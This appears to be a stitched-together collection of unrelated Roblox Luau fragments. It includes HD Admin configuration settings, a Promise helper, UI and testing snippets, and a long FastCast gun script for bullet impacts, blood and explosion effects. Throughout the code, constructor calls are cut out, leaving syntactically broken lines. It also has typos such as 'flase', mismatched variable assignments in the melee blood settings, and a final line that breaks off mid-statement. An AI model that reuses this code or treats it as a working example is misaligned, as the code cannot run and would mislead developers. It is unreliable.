Prefix = ":"; -- The character you use before every command (e.g. ';jump me'). SplitKey = " "; -- The character inbetween command arguments (e.g. setting it to '/' would change ';jump me' to ';jump/me'). BatchKey = ""; -- The character inbetween batch commands (e.g. setting it to '|' would change ';jump me ;fire me ;smoke me' to ';jump me | ;fire me | ;smoke me' QualifierBatchKey = ","; -- The character used to split up qualifiers (e.g. ;jump player1,player2,player3) Theme = "Blue"; -- The default UI theme. NoticeSoundId = 2865227271; -- The SoundId for notices. NoticeVolume = 0.1; -- The Volume for notices. NoticePitch = 1; -- The Pitch/PlaybackSpeed for notices. ErrorSoundId = 2865228021; -- The SoundId for error notifications. ErrorVolume = 0.1; -- The Volume for error notifications. ErrorPitch = 1; -- The Pitch/PlaybackSpeed for error notifications. AlertSoundId = 3140355872; -- The SoundId for alerts. AlertVolume = 0.5; -- The Volume for alerts. AlertPitch = 1; -- The Pitch/PlaybackSpeed for alerts. WelcomeBadgeId = 0; -- Award new players a badge, such as 'Welcome to the game!'. Set to 0 for no badge. CommandDebounce = true; -- Wait until the command effect is over to use again. Helps to limit abuse & lag. Set to 'false' to disable. SaveRank = true; -- Saves a player's rank in the server they received it. (e.g. ;rank plrName rank). Use ';permRank plrName rank' to permanently save a rank. Set to 'false' to disable. LoopCommands = 3; -- The minimum rank required to use LoopCommands. MusicList = {505757009,}; -- Songs which automatically appear in a user's radio. Type '!radio' to display the radio. ThemeColors = { -- The colours players can set their HD Admin UI (in the 'Settings' menu). | Format: {ThemeName, ThemeColor3Value}; {"Red", Color3.fromRGB(150, 0, 0), }; {"Orange", Color3.fromRGB(150, 75, 0), }; {"Brown", Color3.fromRGB(120, 80, 30), }; {"Yellow", Color3.fromRGB(130, 120, 0), }; {"Green", Color3.fromRGB(0, 120, 0), }; {"Blue", Color3.fromRGB(0, 100, 150), }; {"Purple", Color3.fromRGB(100, 0, 150), }; {"Pink", Color3.fromRGB(150, 0, 100), }; {"Black", Color3.fromRGB(60, 60, 60), }; }; Colors = { -- The colours for ChatColors and command arguments. | Format: {"ShortName", "FullName", Color3Value}; {"r", "Red", Color3.fromRGB(255, 0, 0) }; {"o", "Orange", Color3.fromRGB(250, 100, 0) }; {"y", "Yellow", Color3.fromRGB(255, 255, 0) }; {"g", "Green" , Color3.fromRGB(0, 255, 0) }; {"dg", "DarkGreen" , Color3.fromRGB(0, 125, 0) }; {"b", "Blue", Color3.fromRGB(0, 255, 255) }; {"db", "DarkBlue", Color3.fromRGB(0, 50, 255) }; {"p", "Purple", Color3.fromRGB(150, 0, 255) }; {"pk", "Pink", Color3.fromRGB(255, 85, 185) }; {"bk", "Black", Color3.fromRGB(0, 0, 0) }; {"w", "White", Color3.fromRGB(255, 255, 255) }; }; ChatColors = { -- The colour a player's chat will appear depending on their rank. '["Owner"] = "Yellow";' makes the owner's chat yellow. [5] = "Yellow"; }; Cmdbar = 1; -- The minimum rank required to use the Cmdbar. Cmdbar2 = 3; -- The minimum rank required to use the Cmdbar2. ViewBanland = 3; -- The minimum rank required to view the banland. OnlyShowUsableCommands = false; -- Only display commands equal to or below the user's rank on the Commands page. RankRequiredToViewPage = { -- || The pages on the main menu || ["Commands"] = 0; ["Admin"] = 0; ["Settings"] = 0; }; RankRequiredToViewRank = { -- || The rank categories on the 'Ranks' subPage under Admin || ["Owner"] = 0; ["HeadAdmin"] = 0; ["Admin"] = 0; ["Mod"] = 0; ["VIP"] = 0; }; RankRequiredToViewRankType = { -- || The collection of loader-rank-rewarders on the 'Ranks' subPage under Admin || ["Owner"] = 0; ["SpecificUsers"] = 5; ["Gamepasses"] = 0; ["Assets"] = 0; ["Groups"] = 0; ["Friends"] = 0; ["FreeAdmin"] = 0; ["VipServerOwner"] = 0; }; RankRequiredToViewIcon = 0; WelcomeRankNotice = flase; -- The 'You're a [rankName]' notice that appears when you join the game. Set to false to disable. WelcomeDonorNotice = false; -- The 'You're a Donor' notice that appears when you join the game. Set to false to disable. WarnIncorrectPrefix = false; -- Warn the user if using the wrong prefix | "Invalid prefix! Try using [correctPrefix][commandName] instead!" DisableAllNotices = true; -- Set to true to disable all HD Admin notices. ScaleLimit = 4; -- The maximum size players with a rank lower than 'IgnoreScaleLimit' can scale theirself. For example, players will be limited to ;size me 4 (if limit is 4) - any number above is blocked. IgnoreScaleLimit = 3; -- Any ranks equal or above this value will ignore 'ScaleLimit' CommandLimits = { -- Enables you to set limits for commands which have a number argument. Ranks equal to or higher than 'IgnoreLimit' will not be affected by Limit. ["fly"] = { Limit = 10000; IgnoreLimit = 3; }; ["fly2"] = { Limit = 10000; IgnoreLimit = 3; }; ["noclip"] = { Limit = 10000; IgnoreLimit = 3; }; ["noclip2"] = { Limit = 10000; IgnoreLimit = 3; }; ["speed"] = { Limit = 10000; IgnoreLimit = 3; }; ["jumpPower"] = { Limit = 10000; IgnoreLimit = 3; }; }; VIPServerCommandBlacklist = {"permRank", "permBan", "globalAnnouncement"}; -- Commands players are probihited from using in VIP Servers. GearBlacklist = {67798397}; -- The IDs of gear items to block when using the ;gear command. IgnoreGearBlacklist = 4; -- The minimum rank required to ignore the gear blacklist. PlayerDataStoreVersion = "V1.0"; -- Data about the player (i.e. permRanks, custom settings, etc). Changing the Version name will reset all PlayerData. SystemDataStoreVersion = "V1.0"; -- Data about the game (i.e. the banland, universal message system, etc). Changing the Version name will reset all SystemData. CoreNotices = { -- Modify core notices. You can find a table of all CoreNotices under [MainModule > Client > SharedModules > CoreNotices] --NoticeName = NoticeDetails; };
--[[ Creates a function that invokes a callback with correct error handling and resolution mechanisms. ]]
local function createAdvancer(callback, resolve, reject) return function(...) local result = { wpcall(callback, ...) } local ok = table.remove(result, 1) if ok then resolve(unpack(result)) else reject(unpack(result)) end end end local function isEmpty(t) return next(t) == nil end local Promise = {} Promise.__index = Promise Promise.Status = { Started = "Started", Resolved = "Resolved", Rejected = "Rejected", }
--TheNexusAvenger --Centralizes remote object creation.
local RemoteEventCreator = {} local Tool = script.Parent.Parent
--[[ Returns a random vector3 within a region3, that has a clear area around it of specified size. This function yields. ]]
local random = return function(region, clearAreaSize) local position local regionPosition = region.CFrame.Position while not position do local minX, maxX = regionPosition.X - (region.Size.X / 2) + clearAreaSize.X, regionPosition.X + (region.Size.X / 2) - clearAreaSize.X local minY, maxY = regionPosition.Y - (region.Size.Y / 2) + clearAreaSize.Y, regionPosition.Y + (region.Size.Y / 2) - clearAreaSize.Y local minZ, maxZ = regionPosition.Z - (region.Size.Z / 2) + clearAreaSize.Z, regionPosition.Z + (region.Size.Z / 2) - clearAreaSize.Z local x, y, z = random:NextNumber(minX, maxX), random:NextNumber(minY, maxY), random:NextNumber(minZ, maxZ) local clearRegionMax, clearRegionMin =, y, z) + clearAreaSize,, y, z) - clearAreaSize local area =, clearRegionMin) local partsInArea = workspace:FindPartsInRegion3(area, nil, 1) if #partsInArea == 0 then position =, y, z) end wait() end return position end
-- See if already listed
local listed = false for _, i in pairs(plr.PlayerGui.MainGui.RadioSettings.MainFrame.History.Container:GetChildren()) do if i.Name == "Entry" then if i.ID.Value == script.Parent.ID.Value then listed = true break end end end if listed then -- Gray out add button script.Parent.AddButton.TextColor3 = Color3.fromRGB(100, 100, 100) end
--[[ ROBLOX FIXME: add extends and default generic param when supported original code: expect.extend = <T extends JestMatcherState = JestMatcherState>( ]]
Expect.extend = function<T>(matchers: MatchersObject<T>): () setMatchers(matchers, false, Expect) end Expect.anything = anything Expect.any = any
-- Properties
local OptimalEffects = false -- Adjust details of effects by client quality level local RenderDistance = 400 -- Maximum camera distance to render visual effects local ScreenCullingEnabled = true -- Show visual effects when their positions are on screen local MaxDebrisCounts = 100 -- Maximum number of debris objects (mostly decayed projectiles) to exist local RayExit = true -- Only for Wall Penetration FastCast.DebugLogging = false FastCast.VisualizeCasts = false local Beam ="Beam") Beam.TextureSpeed = 0 Beam.LightEmission = 0 Beam.LightInfluence = 1 Beam.Transparency = local BlockSegContainer ="Folder") BlockSegContainer.Name = "BlockSegContainer" BlockSegContainer.Parent = Camera local CylinderSegContainer ="Folder") CylinderSegContainer.Name = "CylinderSegContainer" CylinderSegContainer.Parent = Camera local ConeSegContainer ="Folder") ConeSegContainer.Name = "ConeSegContainer" ConeSegContainer.Parent = Camera local Caster = local BlockSegCache =, 500) BlockSegCache:SetCacheParent(BlockSegContainer) local CylinderSegCache =, 500) CylinderSegCache:SetCacheParent(CylinderSegContainer) local ConeSegCache =, 500) ConeSegCache:SetCacheParent(ConeSegContainer) local ShootId = 0 local DebrisCounts = 0 local PartCacheStorage = {} local function CastWithBlacklist(Cast, Origin, Direction, Blacklist, IgnoreWater) local CastRay =, Direction) local HitPart, HitPoint, HitNormal, HitMaterial = nil, Origin + Direction,, 1, 0), Enum.Material.Air local Success = false repeat HitPart, HitPoint, HitNormal, HitMaterial = Workspace:FindPartOnRayWithIgnoreList(CastRay, Blacklist, false, IgnoreWater) if HitPart then --if Cast.UserData.ClientModule.IgnoreBlacklistedParts and Cast.UserData.ClientModule.BlacklistParts[HitPart.Name] then -- table.insert(Blacklist, HitPart) -- Success = false --else local Target = HitPart:FindFirstAncestorOfClass("Model") local TargetHumanoid = Target and Target:FindFirstChildOfClass("Humanoid") local TargetTool = HitPart:FindFirstAncestorOfClass("Tool") if (HitPart.Transparency > 0.75 or HitPart.Name == "Missile" or HitPart.Name == "Handle" or HitPart.Name == "Effect" or HitPart.Name == "Bullet" or HitPart.Name == "Laser" or string.lower(HitPart.Name) == "water" or HitPart.Name == "Rail" or HitPart.Name == "Arrow" or (TargetHumanoid and (TargetHumanoid.Health <= 0 or not DamageModule.CanDamage(Target, Cast.UserData.Character, Cast.UserData.ClientModule.FriendlyFire) or (Cast.UserData.BounceData and table.find(Cast.UserData.BounceData.BouncedHumanoids, TargetHumanoid)))) or TargetTool) then table.insert(Blacklist, HitPart) Success = false else Success = true end --end else Success = true end until Success return HitPart, HitPoint, HitNormal, HitMaterial end local function AddressTableValue(Enabled, Level, V1, V2) if V1 ~= nil and Enabled and Level then return ((Level == 1 and V1.Level1) or (Level == 2 and V1.Level2) or (Level == 3 and V1.Level3) or V2) else return V2 end end local function CanShowEffects(Position) if ScreenCullingEnabled then local _, OnScreen = Camera:WorldToScreenPoint(Position) return OnScreen and (Position - Camera.CFrame.p).Magnitude <= RenderDistance end return (Position - Camera.CFrame.p).Magnitude <= RenderDistance end local function PopulateHumanoids(Cast, Model) if Model.ClassName == "Humanoid" then if DamageModule.CanDamage(Model.Parent, Cast.UserData.Character, Cast.UserData.ClientModule.FriendlyFire) then table.insert(Humanoids, Model) end end for i, mdl in ipairs(Model:GetChildren()) do PopulateHumanoids(Cast, mdl) end end local function FindNearestEntity(Cast, Position) Humanoids = {} PopulateHumanoids(Cast, Workspace) local Dist = Cast.UserData.HomeData.HomingDistance local TargetModel = nil local TargetHumanoid = nil local TargetTorso = nil for i, v in ipairs(Humanoids) do local torso = v.Parent:FindFirstChild("HumanoidRootPart") or v.Parent:FindFirstChild("Torso") or v.Parent:FindFirstChild("UpperTorso") if v and torso then if (torso.Position - Position).Magnitude < (Dist + (torso.Size.Magnitude / 2.5)) and v.Health > 0 then if not Cast.UserData.HomeData.HomeThroughWall then local hit, pos, normal, material = CastWithBlacklist(Cast, Position, (torso.CFrame.p - Position).Unit * 999, Cast.UserData.IgnoreList, true) if hit then if hit:IsDescendantOf(v.Parent) then if DamageModule.CanDamage(v.Parent, Cast.UserData.Character, Cast.UserData.ClientModule.FriendlyFire) then TargetModel = v.Parent TargetHumanoid = v TargetTorso = torso Dist = (Position - torso.Position).Magnitude end end end else if DamageModule.CanDamage(v.Parent, Cast.UserData.Character, Cast.UserData.ClientModule.FriendlyFire) then TargetModel = v.Parent TargetHumanoid = v TargetTorso = torso Dist = (Position - torso.Position).Magnitude end end end end end return TargetModel, TargetHumanoid, TargetTorso end local function EmitParticle(Particle, Count) if OptimalEffects then local QualityLevel = UserSettings().GameSettings.SavedQualityLevel if QualityLevel == Enum.SavedQualitySetting.Automatic then local Compressor = 1 / 2 Particle:Emit(Count * Compressor) else local Compressor = QualityLevel.Value / 21 Particle:Emit(Count * Compressor) end else Particle:Emit(Count) end end local function FadeBeam(A0, A1, Beam, Hole, FadeTime, Replicate) if FadeTime > 0 then if OptimalEffects then if Replicate then local t0 = os.clock() while Hole ~= nil do local Alpha = math.min((os.clock() - t0) / FadeTime, 1) if Beam then Beam.Transparency =, 1, Alpha)) end if Alpha == 1 then break end Thread:Wait() end if A0 then A0:Destroy() end if A1 then A1:Destroy() end if Beam then Beam:Destroy() end if Hole then Hole:Destroy() end else if A0 then A0:Destroy() end if A1 then A1:Destroy() end if Beam then Beam:Destroy() end if Hole then Hole:Destroy() end end else local t0 = os.clock() while Hole ~= nil do local Alpha = math.min((os.clock() - t0) / FadeTime, 1) if Beam then Beam.Transparency =, 1, Alpha)) end if Alpha == 1 then break end Thread:Wait() end if A0 then A0:Destroy() end if A1 then A1:Destroy() end if Beam then Beam:Destroy() end if Hole then Hole:Destroy() end end else if A0 then A0:Destroy() end if A1 then A1:Destroy() end if Beam then Beam:Destroy() end if Hole then Hole:Destroy() end end end local function MakeImpactFX(Hit, Position, Normal, Material, ParentToPart, ClientModule, Misc, Replicate, IsMelee) local SurfaceCF =, Position + Normal) local HitEffectEnabled = ClientModule.HitEffectEnabled local HitSoundIDs = AddressTableValue(ClientModule.ChargedShotAdvanceEnabled, Misc.ChargeLevel, ClientModule.ChargeAlterTable.HitSoundIDs, ClientModule.HitSoundIDs) local HitSoundPitchMin = AddressTableValue(ClientModule.ChargedShotAdvanceEnabled, Misc.ChargeLevel, ClientModule.ChargeAlterTable.HitSoundPitchMin, ClientModule.HitSoundPitchMin) local HitSoundPitchMax = AddressTableValue(ClientModule.ChargedShotAdvanceEnabled, Misc.ChargeLevel, ClientModule.ChargeAlterTable.HitSoundPitchMax, ClientModule.HitSoundPitchMax) local HitSoundVolume = AddressTableValue(ClientModule.ChargedShotAdvanceEnabled, Misc.ChargeLevel, ClientModule.ChargeAlterTable.HitSoundVolume, ClientModule.HitSoundVolume) local CustomHitEffect = AddressTableValue(ClientModule.ChargedShotAdvanceEnabled, Misc.ChargeLevel, ClientModule.ChargeAlterTable.CustomHitEffect, ClientModule.CustomHitEffect) local BulletHoleEnabled = ClientModule.BulletHoleEnabled local BulletHoleSize = AddressTableValue(ClientModule.ChargedShotAdvanceEnabled, Misc.ChargeLevel, ClientModule.ChargeAlterTable.BulletHoleSize, ClientModule.BulletHoleSize) local BulletHoleTexture = AddressTableValue(ClientModule.ChargedShotAdvanceEnabled, Misc.ChargeLevel, ClientModule.ChargeAlterTable.BulletHoleTexture, ClientModule.BulletHoleTexture) local PartColor = AddressTableValue(ClientModule.ChargedShotAdvanceEnabled, Misc.ChargeLevel, ClientModule.ChargeAlterTable.PartColor, ClientModule.PartColor) local BulletHoleVisibleTime = ClientModule.BulletHoleVisibleTime local BulletHoleFadeTime = ClientModule.BulletHoleFadeTime if IsMelee then HitEffectEnabled = ClientModule.MeleeHitEffectEnabled HitSoundIDs = ClientModule.MeleeHitSoundIDs HitSoundPitchMin = ClientModule.MeleeHitSoundPitchMin HitSoundPitchMax = ClientModule.MeleeHitSoundPitchMax HitSoundVolume = ClientModule.MeleeHitSoundVolume CustomHitEffect = ClientModule.CustomMeleeHitEffect BulletHoleEnabled = ClientModule.MarkerEffectEnabled BulletHoleSize = ClientModule.MarkerEffectSize BulletHoleTexture = ClientModule.MarkerEffectTexture BulletHoleVisibleTime = ClientModule.MarkerEffectVisibleTime BulletHoleFadeTime = ClientModule.MarkerEffectFadeTime PartColor = ClientModule.MarkerPartColor end if HitEffectEnabled then local Attachment ="Attachment") Attachment.CFrame = SurfaceCF Attachment.Parent = Workspace.Terrain local Sound local function Spawner(material) if Misc.HitEffectFolder[material.Name]:FindFirstChild("MaterialSounds") then local tracks = Misc.HitEffectFolder[material.Name].MaterialSounds:GetChildren() local rn = math.random(1, #tracks) local track = tracks[rn] if track ~= nil then Sound = track:Clone() if track:FindFirstChild("Pitch") then Sound.PlaybackSpeed =, track.Pitch.Max.Value) else Sound.PlaybackSpeed =, HitSoundPitchMax) end if track:FindFirstChild("Volume") then Sound.Volume =, track.Volume.Max.Value) else Sound.Volume = HitSoundVolume end Sound.Parent = Attachment end else Sound ="Sound") Sound.SoundId = "rbxassetid://"..HitSoundIDs[math.random(1, #HitSoundIDs)] Sound.PlaybackSpeed =, HitSoundPitchMax) Sound.Volume = HitSoundVolume Sound.Parent = Attachment end for i, v in pairs(Misc.HitEffectFolder[material.Name]:GetChildren()) do if v.ClassName == "ParticleEmitter" then local Count = 1 local Particle = v:Clone() Particle.Parent = Attachment if Particle:FindFirstChild("EmitCount") then Count = Particle.EmitCount.Value end if Particle.PartColor.Value then local HitPartColor = Hit and Hit.Color or Color3.fromRGB(255, 255, 255) if Hit and Hit:IsA("Terrain") then HitPartColor = Workspace.Terrain:GetMaterialColor(Material or Enum.Material.Sand) end Particle.Color =, HitPartColor) end Thread:Delay(0.01, function() EmitParticle(Particle, Count) Debris:AddItem(Particle, Particle.Lifetime.Max) end) end end Sound:Play() if BulletHoleEnabled then local Hole ="Attachment") Hole.Parent = ParentToPart and Hit or Workspace.Terrain Hole.WorldCFrame = SurfaceCF * CFrame.Angles(math.rad(90), math.rad(180), 0) if ParentToPart then local Scale = BulletHoleSize if Misc.HitEffectFolder[material.Name]:FindFirstChild("MaterialHoleSize") then Scale = Misc.HitEffectFolder[material.Name].MaterialHoleSize.Value end local A0 ="Attachment") local A1 ="Attachment") local BeamClone = Beam:Clone() BeamClone.Width0 = Scale BeamClone.Width1 = Scale if Misc.HitEffectFolder[material.Name]:FindFirstChild("MaterialDecals") then local Decals = Misc.HitEffectFolder[material.Name].MaterialDecals:GetChildren() local Chosen = math.random(1, #Decals) local Decal = Decals[Chosen] if Decal ~= nil then BeamClone.Texture = "rbxassetid://"..Decal.Value if Decal.PartColor.Value then local HitPartColor = Hit and Hit.Color or Color3.fromRGB(255, 255, 255) if Hit and Hit:IsA("Terrain") then HitPartColor = Workspace.Terrain:GetMaterialColor(Material or Enum.Material.Sand) end BeamClone.Color ={, HitPartColor),, HitPartColor)}) end end else BeamClone.Texture = "rbxassetid://"..BulletHoleTexture[math.random(1, #BulletHoleTexture)] if PartColor then local HitPartColor = Hit and Hit.Color or Color3.fromRGB(255, 255, 255) if Hit and Hit:IsA("Terrain") then HitPartColor = Workspace.Terrain:GetMaterialColor(Material or Enum.Material.Sand) end BeamClone.Color ={, HitPartColor),, HitPartColor)}) end end BeamClone.Attachment0 = A0 BeamClone.Attachment1 = A1 A0.Parent = Hit A1.Parent = Hit A0.WorldCFrame = Hole.WorldCFrame * / 2, -0.01, 0) * CFrame.Angles(math.rad(90), 0, 0) A1.WorldCFrame = Hole.WorldCFrame * / 2, -0.01, 0) * CFrame.Angles(math.rad(90), math.rad(180), 0) BeamClone.Parent = Workspace.Terrain Thread:Delay(BulletHoleVisibleTime, function() FadeBeam(A0, A1, BeamClone, Hole, BulletHoleFadeTime, Replicate) end) else Debris:AddItem(Hole, 5) end end end if not CustomHitEffect then if Misc.HitEffectFolder:FindFirstChild(Hit.Material) then Spawner(Hit.Material) else Spawner(Misc.HitEffectFolder.Custom) end else Spawner(Misc.HitEffectFolder.Custom) end Debris:AddItem(Attachment, 10) end end local function MakeBloodFX(Hit, Position, Normal, Material, ParentToPart, ClientModule, Misc, Replicate, IsMelee) local SurfaceCF =, Position + Normal) local BloodEnabled = ClientModule.BloodEnabled local HitCharSndIDs = AddressTableValue(ClientModule.ChargedShotAdvanceEnabled, Misc.ChargeLevel, ClientModule.ChargeAlterTable.HitCharSndIDs, ClientModule.HitCharSndIDs) local HitCharSndPitchMin = AddressTableValue(ClientModule.ChargedShotAdvanceEnabled, Misc.ChargeLevel, ClientModule.ChargeAlterTable.HitCharSndPitchMin, ClientModule.HitCharSndPitchMin) local HitCharSndPitchMax = AddressTableValue(ClientModule.ChargedShotAdvanceEnabled, Misc.ChargeLevel, ClientModule.ChargeAlterTable.HitCharSndPitchMax, ClientModule.HitCharSndPitchMax) local HitCharSndVolume = AddressTableValue(ClientModule.ChargedShotAdvanceEnabled, Misc.ChargeLevel, ClientModule.ChargeAlterTable.HitCharSndVolume, ClientModule.HitCharSndVolume) local BloodWoundEnabled = ClientModule.BloodWoundEnabled local BloodWoundTexture = AddressTableValue(ClientModule.ChargedShotAdvanceEnabled, Misc.ChargeLevel, ClientModule.ChargeAlterTable.BloodWoundTexture, ClientModule.BloodWoundTexture) local BloodWoundSize = AddressTableValue(ClientModule.ChargedShotAdvanceEnabled, Misc.ChargeLevel, ClientModule.ChargeAlterTable.BloodWoundSize, ClientModule.BloodWoundSize) local BloodWoundTextureColor = AddressTableValue(ClientModule.ChargedShotAdvanceEnabled, Misc.ChargeLevel, ClientModule.ChargeAlterTable.BloodWoundTextureColor, ClientModule.BloodWoundTextureColor) local BloodWoundPartColor = AddressTableValue(ClientModule.ChargedShotAdvanceEnabled, Misc.ChargeLevel, ClientModule.ChargeAlterTable.BloodWoundPartColor, ClientModule.BloodWoundPartColor) local BloodWoundVisibleTime = ClientModule.BloodWoundVisibleTime local BloodWoundFadeTime = ClientModule.BloodWoundFadeTime if IsMelee then BloodEnabled = ClientModule.MeleeBloodEnabled HitCharSndIDs = ClientModule.MeleeHitCharSndIDs HitCharSndPitchMin = ClientModule.MeleeHitCharSndPitchMin HitCharSndPitchMax = ClientModule.MeleeHitCharSndPitchMax HitCharSndVolume = ClientModule.MeleeHitCharSndVolume BloodWoundEnabled = ClientModule.MeleeBloodWoundEnabled BloodWoundTexture = ClientModule.MeleeBloodWoundTexture BloodWoundSize = ClientModule.MeleeBloodWoundSize BloodWoundTextureColor = ClientModule.MeleeBloodWoundTextureColor BloodWoundPartColor = ClientModule.MeleeBloodWoundVisibleTime BloodWoundVisibleTime = ClientModule.MeleeBloodWoundFadeTime BloodWoundFadeTime = ClientModule.MeleeBloodWoundPartColor end if BloodEnabled then local Attachment ="Attachment") Attachment.CFrame = SurfaceCF Attachment.Parent = Workspace.Terrain local Sound ="Sound") Sound.SoundId = "rbxassetid://"..HitCharSndIDs[math.random(1, #HitCharSndIDs)] Sound.PlaybackSpeed =, HitCharSndPitchMax) Sound.Volume = HitCharSndVolume Sound.Parent = Attachment for i, v in pairs(Misc.BloodEffectFolder:GetChildren()) do if v.ClassName == "ParticleEmitter" then local Count = 1 local Particle = v:Clone() Particle.Parent = Attachment if Particle:FindFirstChild("EmitCount") then Count = Particle.EmitCount.Value end Thread:Delay(0.01, function() EmitParticle(Particle, Count) Debris:AddItem(Particle, Particle.Lifetime.Max) end) end end Sound:Play() Debris:AddItem(Attachment, 10) if BloodWoundEnabled then local Hole ="Attachment") Hole.Parent = ParentToPart and Hit or Workspace.Terrain Hole.WorldCFrame = SurfaceCF * CFrame.Angles(math.rad(90), math.rad(180), 0) if ParentToPart then local A0 ="Attachment") local A1 ="Attachment") local BeamClone = Beam:Clone() BeamClone.Width0 = BloodWoundSize BeamClone.Width1 = BloodWoundSize BeamClone.Texture = "rbxassetid://"..BloodWoundTexture[math.random(1, #BloodWoundTexture)] BeamClone.Color ={, BloodWoundTextureColor),, BloodWoundTextureColor)}) if BloodWoundPartColor then local HitPartColor = Hit and Hit.Color or Color3.fromRGB(255, 255, 255) if Hit and Hit:IsA("Terrain") then HitPartColor = Workspace.Terrain:GetMaterialColor(Material or Enum.Material.Sand) end BeamClone.Color ={, HitPartColor),, HitPartColor)}) end BeamClone.Attachment0 = A0 BeamClone.Attachment1 = A1 A0.Parent = Hit A1.Parent = Hit A0.WorldCFrame = Hole.WorldCFrame * / 2, -0.01, 0) * CFrame.Angles(math.rad(90), 0, 0) A1.WorldCFrame = Hole.WorldCFrame * / 2, -0.01, 0) * CFrame.Angles(math.rad(90), math.rad(180), 0) BeamClone.Parent = Workspace.Terrain Thread:Delay(BloodWoundVisibleTime, function() FadeBeam(A0, A1, BeamClone, Hole, BloodWoundFadeTime, Replicate) end) else Debris:AddItem(Hole, 5) end end end end local function OnRayFinalHit(Cast, Origin, Direction, RaycastResult, SegmentVelocity, CosmeticBulletObject) local EndPos = RaycastResult and RaycastResult.Position or Cast.UserData.SegmentOrigin local ShowEffects = CanShowEffects(EndPos) if not AddressTableValue(Cast.UserData.ClientModule.ChargedShotAdvanceEnabled, Cast.UserData.Misc.ChargeLevel, Cast.UserData.ClientModule.ChargeAlterTable.ExplosiveEnabled, Cast.UserData.ClientModule.ExplosiveEnabled) then if not RaycastResult then return end if RaycastResult.Instance and RaycastResult.Instance.Parent then if RaycastResult.Instance.Name == "_glass" and AddressTableValue(Cast.UserData.ClientModule.ChargedShotAdvanceEnabled, Cast.UserData.Misc.ChargeLevel, Cast.UserData.ClientModule.ChargeAlterTable.CanBreakGlass, Cast.UserData.ClientModule.CanBreakGlass) then if Cast.UserData.Replicate then ShatterGlass:FireServer(RaycastResult.Instance, RaycastResult.Position, Direction) end else if Cast.UserData.ClientModule.BlacklistParts[RaycastResult.Instance.Name] then if ShowEffects then MakeImpactFX(RaycastResult.Instance, RaycastResult.Position, RaycastResult.Normal, RaycastResult.Material, true, Cast.UserData.ClientModule, Cast.UserData.Misc, Cast.UserData.Replicate) end else local Distance = (RaycastResult.Position - Origin).Magnitude local Target = RaycastResult.Instance:FindFirstAncestorOfClass("Model") local TargetHumanoid = Target and Target:FindFirstChildOfClass("Humanoid") local TargetTorso = Target and (Target:FindFirstChild("HumanoidRootPart") or Target:FindFirstChild("Head")) if TargetHumanoid and TargetHumanoid.Health > 0 and TargetTorso then if ShowEffects then MakeBloodFX(RaycastResult.Instance, RaycastResult.Position, RaycastResult.Normal, RaycastResult.Material, true, Cast.UserData.ClientModule, Cast.UserData.Misc, Cast.UserData.Replicate) end if Cast.UserData.Replicate then if TargetHumanoid.Health > 0 then Thread:Spawn(function() InflictTarget:InvokeServer("Gun", Cast.UserData.Tool, Cast.UserData.ClientModule, TargetHumanoid, TargetTorso, RaycastResult.Instance, RaycastResult.Instance.Size, Cast.UserData.Misc, Distance) end) if Cast.UserData.Tool and Cast.UserData.Tool.GunClient:FindFirstChild("MarkerEvent") then Cast.UserData.Tool.GunClient.MarkerEvent:Fire(Cast.UserData.ClientModule, RaycastResult.Instance.Name == "Head" and Cast.UserData.ClientModule.HeadshotHitmarker) end end end else if ShowEffects then MakeImpactFX(RaycastResult.Instance, RaycastResult.Position, RaycastResult.Normal, RaycastResult.Material, true, Cast.UserData.ClientModule, Cast.UserData.Misc, Cast.UserData.Replicate) end end end end end else if Cast.UserData.ClientModule.ExplosionSoundEnabled then local SoundTable = AddressTableValue(Cast.UserData.ClientModule.ChargedShotAdvanceEnabled, Cast.UserData.Misc.ChargeLevel, Cast.UserData.ClientModule.ChargeAlterTable.ExplosionSoundIDs, Cast.UserData.ClientModule.ExplosionSoundIDs) local Attachment ="Attachment") Attachment.CFrame = Attachment.Parent = Workspace.Terrain local Sound ="Sound") Sound.SoundId = "rbxassetid://"..SoundTable[math.random(1, #SoundTable)] Sound.PlaybackSpeed =, Cast.UserData.Misc.ChargeLevel, Cast.UserData.ClientModule.ChargeAlterTable.ExplosionSoundPitchMin, Cast.UserData.ClientModule.ExplosionSoundPitchMin), AddressTableValue(Cast.UserData.ClientModule.ChargedShotAdvanceEnabled, Cast.UserData.Misc.ChargeLevel, Cast.UserData.ClientModule.ChargeAlterTable.ExplosionSoundPitchMax, Cast.UserData.ClientModule.ExplosionSoundPitchMax)) Sound.Volume = AddressTableValue(Cast.UserData.ClientModule.ChargedShotAdvanceEnabled, Cast.UserData.Misc.ChargeLevel, Cast.UserData.ClientModule.ChargeAlterTable.ExplosionSoundVolume, Cast.UserData.ClientModule.ExplosionSoundVolume) Sound.Parent = Attachment Sound:Play() Debris:AddItem(Attachment, 10) end local Explosion ="Explosion") Explosion.BlastRadius = AddressTableValue(Cast.UserData.ClientModule.ChargedShotAdvanceEnabled, Cast.UserData.Misc.ChargeLevel, Cast.UserData.ClientModule.ChargeAlterTable.ExplosionRadius, Cast.UserData.ClientModule.ExplosionRadius) Explosion.BlastPressure = 0 Explosion.ExplosionType = Enum.ExplosionType.NoCraters Explosion.Position = EndPos Explosion.Parent = Camera local SurfaceCF = RaycastResult and, RaycastResult.Position + RaycastResult.Normal) or, Cast.UserData.SegmentOrigin + Cast.UserData.SegmentDirection) if ShowEffects and RaycastResult then if AddressTableValue(Cast.UserData.ClientModule.ChargedShotAdvanceEnabled, Cast.UserData.Misc.ChargeLevel, Cast.UserData.ClientModule.ChargeAlterTable.ExplosionCraterEnabled, Cast.UserData.ClientModule.ExplosionCraterEnabled) then if RaycastResult.Instance and RaycastResult.Instance.Parent then local Target = RaycastResult.Instance:FindFirstAncestorOfClass("Model") local TargetHumanoid = Target and Target:FindFirstChildOfClass("Humanoid") if not TargetHumanoid then local ParentToPart = true local Hole ="Attachment") Hole.Parent = ParentToPart and RaycastResult.Instance or Workspace.Terrain Hole.WorldCFrame = SurfaceCF * CFrame.Angles(math.rad(90), math.rad(180), 0) if ParentToPart then local Scale = AddressTableValue(Cast.UserData.ClientModule.ChargedShotAdvanceEnabled, Cast.UserData.Misc.ChargeLevel, Cast.UserData.ClientModule.ChargeAlterTable.ExplosionCraterSize, Cast.UserData.ClientModule.ExplosionCraterSize) local Texture = AddressTableValue(Cast.UserData.ClientModule.ChargedShotAdvanceEnabled, Cast.UserData.Misc.ChargeLevel, Cast.UserData.ClientModule.ChargeAlterTable.ExplosionCraterTexture, Cast.UserData.ClientModule.ExplosionCraterTexture) local A0 ="Attachment") local A1 ="Attachment") local BeamClone = Beam:Clone() BeamClone.Width0 = Scale BeamClone.Width1 = Scale BeamClone.Texture = 